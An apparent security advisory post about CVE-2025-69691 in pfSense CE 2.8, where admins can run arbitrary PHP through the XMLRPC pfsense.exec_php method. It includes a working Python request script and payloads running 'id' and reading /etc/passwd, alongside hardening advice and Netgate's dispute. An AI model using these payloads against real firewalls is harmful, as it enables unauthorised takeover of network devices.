Netgate’s pfSense is a popular open-source firewall and router. In pfSense CE 2.8, a behavior tracked as CVE-2025-69691 has been reported: an authenticated administrator can execute arbitrary PHP code on the firewall through the pfsense.exec_php method of the XMLRPC API.

Some argue this is not a vulnerability, because calling the method already requires administrator-level access (and an administrator can do anything on the device). Even so, anyone securing or deploying pfSense should understand this behavior.

What Is CVE-2025-69691?

Summary:
In pfSense CE 2.8, the xmlrpc.php API endpoint exposes the pfsense.exec_php method. A caller who authenticates with administrator credentials can submit arbitrary PHP source code in the request, and the pfSense device executes it and returns the result.

Is it a big deal?
- If an attacker steals admin credentials, or if you mistakenly give admin-level API access to an untrusted user, they gain full control over your firewall: the PHP code runs as the web server user on the device and can call system(), shell_exec() and similar functions.
- However, the pfSense supplier (Netgate) disputes calling this a “vulnerability”, because the behavior is deliberate and only available to fully trusted users.

Where Does It Happen? The XMLRPC API

The file involved is /xmlrpc.php, the same endpoint pfSense uses for High Availability configuration sync between a primary and secondary node.
The method that leads to code execution is called pfsense.exec_php.

If you call this method over the API while authenticated as an admin, pfSense will literally execute the PHP code you supply and return its result in the XMLRPC response.

Here’s how an API call to pfsense.exec_php might look using Python and the requests library:

import requests
from requests.auth import HTTPBasicAuth
from xml.sax.saxutils import escape

# Target pfSense device (the webGUI's XMLRPC endpoint)
url = "https://your-pfsense.example.com/xmlrpc.php"

# The PHP code you want to execute on the firewall
php_code = "echo system('id');"

# XMLRPC payload. The PHP source is XML-escaped so that characters such as
# '<', '>' and '&' inside the code cannot break the request document.
xml = f'''
<?xml version="1.0"?>
<methodCall>
  <methodName>pfsense.exec_php</methodName>
  <params>
    <param>
      <value><string>{escape(php_code)}</string></value>
    </param>
  </params>
</methodCall>
'''

headers = {'Content-Type': 'text/xml'}

# Authenticated admin credentials
username = "admin"
password = "your_admin_password"

response = requests.post(
    url,
    data=xml.strip(),  # the XML declaration must be the first bytes of the body
    headers=headers,
    auth=HTTPBasicAuth(username, password),
    verify=False,  # Only for testing; don't use in production
    timeout=30,
)

# The reply is a <methodResponse> document carrying whatever the PHP code returned
response.raise_for_status()
print(response.text)

When run with valid admin credentials, this snippet returns the output of system('id') from the firewall. You can swap "id" for any other OS command, or replace the PHP code entirely, since the method executes whatever PHP source it is given.

Real-World Risk

- Who is vulnerable? Only pfSense devices where an attacker can reach the XMLRPC API and authenticate with admin credentials.
- Is this a remote bug? The method is reachable over the network by anyone who can connect to the webGUI, so you are at risk if admin credentials are weak, reused or stolen, or if the webGUI (and therefore /xmlrpc.php) is exposed to untrusted networks.
- Can a regular user exploit it? No. Only accounts with full admin rights on the pfSense device can call pfsense.exec_php.

Another example: call pfsense.exec_php with the PHP code `echo shell_exec('cat /etc/passwd');` (that is, set php_code to this string in the script above).

If the admin credentials are correct, the API returns the contents of /etc/passwd.

Netgate says

> This is not a vulnerability. The XMLRPC API pfsense.exec_php call is only accessible to authenticated admins, and admins are intentionally allowed to execute PHP code on pfSense systems.

In summary: someone who already has admin access can always run code on the device (for example by editing files or installing packages through the webGUI), so this API call does not give them anything they did not already have.

Closing Advice

- Protect admin API access. Only trusted users should hold admin credentials, and those credentials should be strong and unique. Restrict who can reach the webGUI, and therefore /xmlrpc.php, with firewall rules: management hosts and the HA sync peer only. Don’t expose the XMLRPC API to the open internet.

- Limit API permissions. Any account with admin rights can use the API to run code, so don’t grant admin rights to users who don’t need them.

- Watch the endpoint. Outside of HA sync, POST requests to /xmlrpc.php should be rare; review the web server access logs for calls from hosts that are not your sync peer.

References / Further Reading

- pfSense XMLRPC API Reference
- CVE-2025-69691 Entry (mitre.org) *(placeholder until public release)*
- Netgate Security Advisories

Should you worry? Only if your admin credentials are weak or your API is exposed to networks you don’t trust.

Bottom line: don’t expose the pfSense webGUI or its XMLRPC API beyond your management network, and give admin access only to trusted administrators.

---

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 05:51:51 UTC